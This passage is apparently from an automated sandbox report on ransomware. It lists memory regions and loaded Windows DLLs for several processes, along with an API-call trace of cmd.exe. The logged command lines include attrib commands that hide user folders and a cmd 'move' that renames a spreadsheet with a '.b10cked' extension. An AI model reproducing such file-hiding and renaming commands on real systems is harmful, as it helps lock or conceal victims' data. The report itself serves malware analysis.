start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12342 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12343 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12344 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12345 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12346 start_va = 0x170000 end_va = 0x237fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 12347 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12348 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 169 os_tid = 0xaf4 Process: id = "113" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16740" os_pid = "0xb98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "111" os_parent_pid = "0xaa4" cmd_line = "attrib +h 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12414 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12415 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12416 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12417 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 12418 start_va = 0x7e0000 end_va = 0x7e6fff entry_point = 0x7e0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 12419 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12420 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12421 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12422 start_va 
= 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 12423 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12424 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12425 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12426 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12427 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 12428 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 12429 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 12430 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12431 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12432 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") 
Region: id = 12433 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12434 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12435 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12436 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12437 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12438 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12439 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12440 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12441 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 12442 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 
region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12443 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 170 os_tid = 0xb80 Process: id = "114" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16740" os_pid = "0xb64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "111" os_parent_pid = "0xaa4" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12444 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12445 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12446 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12447 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 12448 start_va = 0x650000 end_va = 0x656fff entry_point = 0x650000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: 
"c:\\windows\\system32\\attrib.exe") Region: id = 12449 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12450 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12451 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12452 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 12453 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12454 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12455 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12456 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 12457 start_va = 0x1f0000 end_va = 0x256fff entry_point = 0x1f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12458 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 12459 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: 
"c:\\windows\\system32\\ulib.dll") Region: id = 12460 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12461 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12462 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12463 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12464 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12465 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12466 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12467 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12468 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" 
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12469 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12470 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12471 start_va = 0x2d0000 end_va = 0x397fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 12472 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12473 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 171 os_tid = 0xae8 Process: id = "115" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xba0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\OASES7~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Oases7ZDuwJ0FV.xls.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM 
Authentication" [0x7] Region: id = 12486 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12487 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12488 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12489 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 12490 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 12491 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12492 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12493 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 12494 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 12495 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12516 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12517 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12518 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12519 start_va = 0x170000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 12520 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 12521 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12522 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12523 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12524 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12525 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12526 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12527 start_va = 
0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12528 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12529 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12530 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 12531 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12532 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12533 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 12534 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 12535 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 12536 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 12537 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 12538 start_va = 0x5d0000 end_va = 0x11cffff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 12539 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Thread: id = 172 os_tid = 0xb5c [0132.567] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efa64 | out: lpSystemTimeAsFileTime=0x2efa64*(dwLowDateTime=0x88f39b00, dwHighDateTime=0x1d440a9)) [0132.567] GetCurrentProcessId () returned 0xba0 [0132.567] GetCurrentThreadId () returned 0xb5c [0132.567] GetTickCount () returned 0x2a2c3 [0132.567] QueryPerformanceCounter (in: lpPerformanceCount=0x2efa5c | out: lpPerformanceCount=0x2efa5c*=18935670475) returned 1 [0132.568] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0132.568] __set_app_type (_Type=0x1) [0132.568] __p__fmode () returned 0x76b331f4 [0132.568] __p__commode () returned 0x76b331fc [0132.568] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0132.568] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0132.568] GetCurrentThreadId () returned 0xb5c [0132.569] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb5c) returned 0x38 [0132.569] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0132.569] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0132.569] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.569] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0132.569] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ef9f4 | out: phkResult=0x2ef9f4*=0x0) returned 0x2 [0132.569] VirtualQuery (in: lpAddress=0x2efa2b, lpBuffer=0x2ef9c4, 
dwLength=0x1c | out: lpBuffer=0x2ef9c4*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.569] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef9c4, dwLength=0x1c | out: lpBuffer=0x2ef9c4*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0132.569] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef9c4, dwLength=0x1c | out: lpBuffer=0x2ef9c4*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0132.569] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef9c4, dwLength=0x1c | out: lpBuffer=0x2ef9c4*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.569] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef9c4, dwLength=0x1c | out: lpBuffer=0x2ef9c4*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0132.569] GetConsoleOutputCP () returned 0x1b5 [0132.569] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0132.569] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0132.569] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.569] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0132.569] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.569] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0132.570] _get_osfhandle (_FileHandle=1) returned 0x7 [0132.570] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0132.570] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.570] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 
[0132.570] _get_osfhandle (_FileHandle=0) returned 0x3 [0132.570] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0132.570] GetEnvironmentStringsW () returned 0x3d0198* [0132.570] FreeEnvironmentStringsW (penv=0x3d0198) returned 1 [0132.570] GetEnvironmentStringsW () returned 0x3d0198* [0132.570] FreeEnvironmentStringsW (penv=0x3d0198) returned 1 [0132.570] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee964 | out: phkResult=0x2ee964*=0x40) returned 0x0 [0132.570] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x0, lpData=0x2ee970*=0xc0, lpcbData=0x2ee968*=0x1000) returned 0x2 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x4, lpData=0x2ee970*=0x1, lpcbData=0x2ee968*=0x4) returned 0x0 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x0, lpData=0x2ee970*=0x1, lpcbData=0x2ee968*=0x1000) returned 0x2 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x4, lpData=0x2ee970*=0x0, lpcbData=0x2ee968*=0x4) returned 0x0 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x4, lpData=0x2ee970*=0x40, lpcbData=0x2ee968*=0x4) returned 0x0 [0132.571] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee96c, lpData=0x2ee970, lpcbData=0x2ee968*=0x1000 | out: lpType=0x2ee96c*=0x4, lpData=0x2ee970*=0x40, lpcbData=0x2ee968*=0x4) 
